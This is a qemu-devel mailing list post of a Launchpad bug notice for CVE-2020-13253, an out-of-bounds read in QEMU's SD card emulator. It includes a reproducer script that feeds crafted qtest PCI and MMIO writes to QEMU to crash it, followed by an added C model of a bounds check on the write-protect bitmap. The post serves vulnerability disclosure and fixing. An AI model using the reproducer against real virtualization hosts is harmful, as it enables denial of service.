qemu-devel


From: P J P
Subject: [Bug 1880822] Re: CVE-2020-13253 QEMU: sd: OOB access could crash the guest resulting in DoS
Date: Wed, 27 May 2020 07:15:19 -0000

#!/bin/sh

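# qtest command sequence: PCI config-space setup through ports 0xcf8/0xcfc
# (BAR at 0xe1068000, command register 0x7), then MMIO writes into that BAR.
cat << EOF > inp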
outl 0xcf8 0x80001810
outl 0xcfc 0xe1068000
outl 0xcf8 0x80001814
outl 0xcf8 0x80001804
outw 0xcfc 0x7
outl 0xcf8 0x8000fa20
write 0xe106802c 0x1 0x6d
write 0xe106800f 0x1 0xf7
write 0xe106800a 0x6 0x9b4b9b5a9b69
write 0xe1068028 0x3 0x6d6d6d
write 0xe106800f 0x1 0x02
write 0xe1068005 0xb 0x055cfbffffff000000ff03
write 0xe106800c 0x1d 0x050bc6c6c6c6c6c6c6c6762e4c5e0bc603040000000000e10200110000
write 0xe1068003 0xd 0x2b6de02c3a6de02c496de02c58
EOF
 
# Feed the commands to QEMU's qtest interface on stdin.
../bin/qemu-system-x86_64 -qtest stdio -enable-kvm -monitor none \
     -serial none -M pc-q35-5.0 -device sdhci-pci,sd-spec-version=3 \
     -device sd-card,drive=mydrive -nographic \
     -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive < inp

-- 
You received this bug notification because you are a member of
qemu-devel-ml, which is subscribed to QEMU.
https://bugs.launchpad.net/bugs/1880822

Title:
  CVE-2020-13253 QEMU: sd: OOB access could crash the guest resulting in
  DoS

Status in QEMU:
  New

Bug description:
  An out-of-bounds read access issue was found in the SD Memory Card
  emulator of QEMU. It occurs while performing block write commands
  via sdhci_write(), if a guest user has sent an 'address' which is OOB
  of 's->wp_groups'. A guest user/process may use this flaw to crash the
  QEMU process resulting in DoS.

To manage notifications about this bug go to:
https://bugs.launchpad.net/qemu/+bug/1880822/+subscriptions
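
The condition named in the bug description (a guest-supplied address indexing past a write-protect-group bitmap), as an added example that is neither QEMU's code nor the fix from this thread. It is a simplified model showing the range check that belongs in front of the bitmap lookup; the struct, function names and 512 KiB group size are assumptions.

```c
/* Added illustration, not QEMU code: all names and sizes are hypothetical. */
#include <limits.h>
#include <stdint.h>
#include <stdlib.h>

#define WPGROUP_SHIFT 19   /* assumed: one write-protect group per 512 KiB */
#define WORD_BITS (sizeof(unsigned long) * CHAR_BIT)
enum wr_status { WR_OK, WR_PROTECTED, WR_ADDRESS_ERROR };

struct card {
    uint64_t size;             /* capacity in bytes */
    unsigned long *wp_groups;  /* one bit per group, sized from 'size' */
};

static int card_init(struct card *c, uint64_t size)
{
    size_t groups = (size_t)((size + (1ULL << WPGROUP_SHIFT) - 1) >> WPGROUP_SHIFT);
    c->size = size;
    c->wp_groups = calloc((groups + WORD_BITS - 1) / WORD_BITS, sizeof(unsigned long));
    return c->wp_groups ? 0 : -1;
}

/* Unchecked: index comes straight from the guest address; in-range callers only. */
static int wp_test_unchecked(const struct card *c, uint64_t addr)
{
    size_t g = (size_t)(addr >> WPGROUP_SHIFT);
    return (int)((c->wp_groups[g / WORD_BITS] >> (g % WORD_BITS)) & 1UL);
}

/* Checked: reject any [addr, addr + len) that leaves the card, overflow-safe. */
static enum wr_status block_write_check(const struct card *c, uint64_t addr, uint32_t len)
{
    if (addr >= c->size || len > c->size - addr)
        return WR_ADDRESS_ERROR;
    return wp_test_unchecked(c, addr) ? WR_PROTECTED : WR_OK;
}

int main(void)
{
    struct card c;
    if (card_init(&c, 4ULL << 20)) return 1;   /* constructed 4 MiB card */
    c.wp_groups[0] |= 1UL << 2;                /* protect the group at 1 MiB */
    int ok = block_write_check(&c, 1ULL << 20, 512) == WR_PROTECTED &&
             block_write_check(&c, 0xffffff00ULL, 512) == WR_ADDRESS_ERROR;
    free(c.wp_groups);
    return ok ? 0 : 1;
}
```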


